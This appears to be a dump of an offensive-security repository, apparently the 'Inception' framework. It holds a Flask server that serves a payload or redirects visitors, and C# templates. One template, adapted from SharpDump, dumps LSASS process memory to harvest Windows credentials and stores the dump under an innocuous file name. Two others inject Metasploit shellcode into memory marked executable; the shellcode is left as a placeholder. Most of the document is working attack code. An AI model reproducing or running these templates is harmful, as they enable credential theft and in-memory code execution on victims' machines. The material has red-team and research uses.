20 | 		return payload_string
21 | 	else:
22 | 		return redirect(redirectURL, code=302)
23 | 
24 | 
25 | if __name__ == "__main__":
26 | 	app.run(host='0.0.0.0', port=80)
27 | 


--------------------------------------------------------------------------------
/SharpDump.licence:
--------------------------------------------------------------------------------
 1 | SharpDump is provided under the 3-clause BSD license below.
 2 | 
 3 | *************************************************************
 4 | 
 5 | Copyright (c) 2018, Will Schroeder
 6 | All rights reserved.
 7 | 
 8 | Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
 9 | 
10 |     Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
11 |     Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
12 |     The names of its contributors may not be used to endorse or promote products derived from this software without specific prior written permission.
13 | 
14 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
15 | 


--------------------------------------------------------------------------------
/Slides/AV Slides.key:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/Slides/AV Slides.key


--------------------------------------------------------------------------------
/Slides/AV Slides.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/two06/Inception/a75a4839ce006e0056d7863126320f9df1f4f6b2/Slides/AV Slides.pptx


--------------------------------------------------------------------------------
/Templates/Custom/SharpDump.txt:
--------------------------------------------------------------------------------
  1 | using System;
  2 | using System.Diagnostics;
  3 | using System.IO;
  4 | using System.IO.Compression;
  5 | using System.Runtime.InteropServices;
  6 | using System.Security.Principal;
  7 | 
  8 | namespace Inception
  9 | {
 10 |     class Program
 11 |     {
 12 | 	//SharpDump (https://github.com/GhostPack/SharpDump)
 13 | 	//Modified by @two06 for use with Inception framework
 14 | 
 15 | 
 16 |         // partially adapted from https://blogs.msdn.microsoft.com/dondu/2010/10/24/writing-minidumps-in-c/
 17 | 
 18 |         // Overload supporting MiniDumpExceptionInformation == NULL
 19 |         [DllImport("dbghelp.dll", EntryPoint = "MiniDumpWriteDump", CallingConvention = CallingConvention.StdCall, CharSet = CharSet.Unicode, ExactSpelling = true, SetLastError = true)]
 20 |         static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId, SafeHandle hFile, uint dumpType, IntPtr expParam, IntPtr userStreamParam, IntPtr callbackParam);
 21 | 
 22 |         public static bool IsHighIntegrity()
 23 |         {
 24 |             // returns true if the current process is running with adminstrative privs in a high integrity context
 25 |             WindowsIdentity identity = WindowsIdentity.GetCurrent();
 26 |             WindowsPrincipal principal = new WindowsPrincipal(identity);
 27 |             return principal.IsInRole(WindowsBuiltInRole.Administrator);
 28 |         }
 29 | 
 30 |         public static void Compress(string inFile, string outFile)
 31 |         {
 32 |             try
 33 |             {
 34 |                 if (File.Exists(outFile))
 35 |                 {
 36 |                     Console.WriteLine("[X] Output file '{0}' already exists, removing", outFile);
 37 |                     File.Delete(outFile);
 38 |                 }
 39 | 
 40 |                 var bytes = File.ReadAllBytes(inFile);
 41 |                 using (FileStream fs = new FileStream(outFile, FileMode.CreateNew))
 42 |                 {
 43 |                     using (GZipStream zipStream = new GZipStream(fs, CompressionMode.Compress, false))
 44 |                     {
 45 |                         zipStream.Write(bytes, 0, bytes.Length);
 46 |                     }
 47 |                 }
 48 |             }
 49 |             catch (Exception ex)
 50 |             {
 51 |                 return;
 52 |             }
 53 |         }
 54 | 
 55 |         public static void Minidump(int pid = -1)
 56 |         {
 57 |             IntPtr targetProcessHandle = IntPtr.Zero;
 58 |             uint targetProcessId = 0;
 59 | 
 60 |             Process targetProcess = null;
 61 |             if (pid == -1)
 62 |             {
 63 |                 Process[] processes = Process.GetProcessesByName("lsass");
 64 |                 targetProcess = processes[0];
 65 |             }
 66 |             else
 67 |             {
 68 |                 return;
 69 |             }
 70 | 
 71 |             try
 72 |             {
 73 |                 targetProcessId = (uint)targetProcess.Id;
 74 |                 targetProcessHandle = targetProcess.Handle;
 75 |             }
 76 |             catch (Exception ex)
 77 |             {
 78 |                 return;
 79 |             }
 80 |             bool bRet = false;
 81 | 
 82 |             string systemRoot = Environment.GetEnvironmentVariable("SystemRoot");
 83 |             string dumpFile = String.Format("{0}\\Temp\\debug{1}.out", systemRoot, targetProcessId);
 84 |             string zipFile = String.Format("{0}\\Temp\\debug{1}.bin", systemRoot, targetProcessId);
 85 | 
 86 |             using (FileStream fs = new FileStream(dumpFile, FileMode.Create, FileAccess.ReadWrite, FileShare.Write))
 87 |             {
 88 |                 bRet = MiniDumpWriteDump(targetProcessHandle, targetProcessId, fs.SafeFileHandle, (uint)2, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero);
 89 |             }
 90 | 
 91 |             // if successful
 92 |             if(bRet)
 93 |             {
 94 |                 Compress(dumpFile, zipFile);
 95 |                 File.Delete(dumpFile);
 96 |             }
 97 |             else
 98 |             {
 99 |                 return;
100 |             }
101 |         }
102 | 
103 |         public static void Run()
104 |         {
105 |             if (!IsHighIntegrity())
106 |             {
107 |                 return;
108 |             }
109 |             else
110 |             {
111 |                 string systemRoot = Environment.GetEnvironmentVariable("SystemRoot");
112 |                 string dumpDir = String.Format("{0}\\Temp\\", systemRoot);
113 |                 if (!Directory.Exists(dumpDir))
114 |                 {
115 |                     return;
116 |                 }
117 | 
118 |                 Minidump();
119 |             }
120 |         }
121 |     }
122 | }
123 | 


--------------------------------------------------------------------------------
/Templates/ShellCode/ShellCode_Inject.txt:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Collections.Generic;
 3 | using System.Linq;
 4 | using System.Text;
 5 | using System.Threading.Tasks;
 6 | using System.Runtime.InteropServices;
 7 | 
 8 | namespace Inception
 9 | {
10 | public class Program
11 | {
12 | public static void Run()
13 | {
14 | 
15 | // native function’s compiled code
16 | // generated with metasploit
17 | byte[] shellcode = new byte[] {
18 |      <SHELLCODE>
19 | };
20 | 
21 | UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
22 | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
23 | Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
24 | IntPtr hThread = IntPtr.Zero;
25 | UInt32 threadId = 0;
26 | // prepare data
27 | 
28 | IntPtr pinfo = IntPtr.Zero;
29 | 
30 | // execute native code
31 | 
32 | hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
33 | WaitForSingleObject(hThread, 0xFFFFFFFF);
34 | 
35 | }
36 | 
37 | private static UInt32 MEM_COMMIT = 0x1000;
38 | 
39 | private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
40 | 
41 | [DllImport("kernel32")]
42 | private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
43 | UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
44 | 
45 | [DllImport("kernel32")]
46 | private static extern bool VirtualFree(IntPtr lpAddress,
47 | UInt32 dwSize, UInt32 dwFreeType);
48 | 
49 | [DllImport("kernel32")]
50 | private static extern IntPtr CreateThread(
51 | 
52 | UInt32 lpThreadAttributes,
53 | UInt32 dwStackSize,
54 | UInt32 lpStartAddress,
55 | IntPtr param,
56 | UInt32 dwCreationFlags,
57 | ref UInt32 lpThreadId
58 | 
59 | );
60 | [DllImport("kernel32")]
61 | private static extern bool CloseHandle(IntPtr handle);
62 | 
63 | [DllImport("kernel32")]
64 | private static extern UInt32 WaitForSingleObject(
65 | 
66 | IntPtr hHandle,
67 | UInt32 dwMilliseconds
68 | );
69 | [DllImport("kernel32")]
70 | private static extern IntPtr GetModuleHandle(
71 | 
72 | string moduleName
73 | 
74 | );
75 | [DllImport("kernel32")]
76 | private static extern UInt32 GetProcAddress(
77 | 
78 | IntPtr hModule,
79 | string procName
80 | 
81 | );
82 | [DllImport("kernel32")]
83 | private static extern UInt32 LoadLibrary(
84 | 
85 | string lpFileName
86 | 
87 | );
88 | [DllImport("kernel32")]
89 | private static extern UInt32 GetLastError();
90 | 
91 | }
92 | }
93 | 


--------------------------------------------------------------------------------
/Templates/ShellCode/ShellCode_Inject_64.txt:
--------------------------------------------------------------------------------
 1 | using System;
 2 | using System.Reflection;
 3 | using System.Runtime.InteropServices;
 4 | namespace Inception
 5 | {
 6 |         class Program
 7 |         {
 8 |                 [DllImport("kernel32.dll", SetLastError = true)]
 9 |                 static extern bool VirtualProtect(IntPtr lpAddress, uint dwSize, uint flNewProtect, out uint lpflOldProtect);
10 |                 public delegate uint Ret1ArgDelegate(uint address);
11 |                 static uint PlaceHolder1(uint arg1) { return 0; }
12 |                 public static byte[] asmBytes = new byte[]
13 |                 {
14 |                         <SHELLCODE>
15 |                 };
16 |                 public unsafe static void Run()
17 |                 {
18 |                         fixed (byte* startAddress = &asmBytes[0]) // Take the address of our x86 code
19 |                         {
20 |                                 // Get the FieldInfo for "_methodPtr"
21 |                                 Type delType = typeof(Delegate);
22 |                                 FieldInfo _methodPtr = delType.GetField("_methodPtr", BindingFlags.NonPublic |
23 |                                 BindingFlags.Instance);
24 |                                 // Set our delegate to our x86 code
25 |                                 Ret1ArgDelegate del = new Ret1ArgDelegate(PlaceHolder1);
26 |                                 _methodPtr.SetValue(del, (IntPtr) startAddress);
27 |                                 //Disable protection
28 |                                 uint outOldProtection;
29 |                                 VirtualProtect((IntPtr) startAddress, (uint) asmBytes.Length, 0x40, out outOldProtection);
30 |                                 // Enjoy
31 |                                 uint n = (uint)0x00000001;
32 |                                 n = del(n);
33 |                                 Console.WriteLine("{0:x}", n);
34 |                                 Console.ReadKey();
35 |                         }
36 |                 }
37 |         }
38 | }
39 | 


--------------------------------------------------------------------------------